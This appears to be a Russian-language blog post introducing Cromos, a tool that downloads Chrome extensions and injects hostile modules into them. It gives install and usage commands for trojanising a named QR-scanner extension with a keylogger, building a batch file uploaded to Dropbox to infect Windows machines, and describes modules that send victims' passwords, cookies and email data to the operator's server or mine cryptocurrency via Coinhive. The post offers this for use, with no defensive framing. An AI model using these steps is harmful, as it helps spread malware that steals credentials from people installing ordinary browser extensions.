И снова здравствуйте! Данный материал будет посвящен инструменту, позволяющему вносить изменения в расширения для браузера, наделяя их недокументированными возможностями.



Cromos - это инструмент для загрузки расширений из интернет-магазина Chrome и инъекции в них своего кода. Есть возможность создания собственных исполняемых файлов и функция размещения файлов в Dropbox.

Функционал:

· Загрузка расширения

· Инъекция кода

· Загрузка файлов в Dropbox

· Заражение ОС семейства Windows

Установка:

> git clone https://github.com/fbctf/cromos

> cd /cromos

> pip install –r requirements.txt

> python setup.py


Справка:

> ./cromos.py –h



Использование:

· Скачиваем подходящее расширение из маркета, предварительно узнав его ID.

> python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb

Я использовал QR code scanner.



· Скачиваем нужное расширение и дополняем его установкой модуля keylogger.

> python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb --load keylogger




Подходящего сервера для требований кейлоггера, у меня сейчас нет, так, что проверить его работу не смогу. Надеюсь, кто-то в комментариях протестирует и отпишется.

Модифицированное расширение, можно найти здесь:



Создание пакетного файла и загрузка его в Dropbox:

> python cromos.py --extension {id} --build {bat} --token {dropboxToken}

Модули:

· modules/keylogger - Этот модуль фиксирует все пароли, которые вы вводите в зараженном браузере через https или нет. Все, что вам нужно, это иметь, например php-сервер, для получения: данных электронной почты, пароли, файлы cookie и userAgent.

· modules/currency – Модуль майнинга криптовалют. Необходима учетная запись – coinhive.

Небольшой ролик, по использованию инструмента от разработчиков:

> https://asciinema.org/a/ENrke3a5kU83jC3hXIDdgWWyd?autoplay=1

На этом можно завершить. Спасибо за уделенное внимание.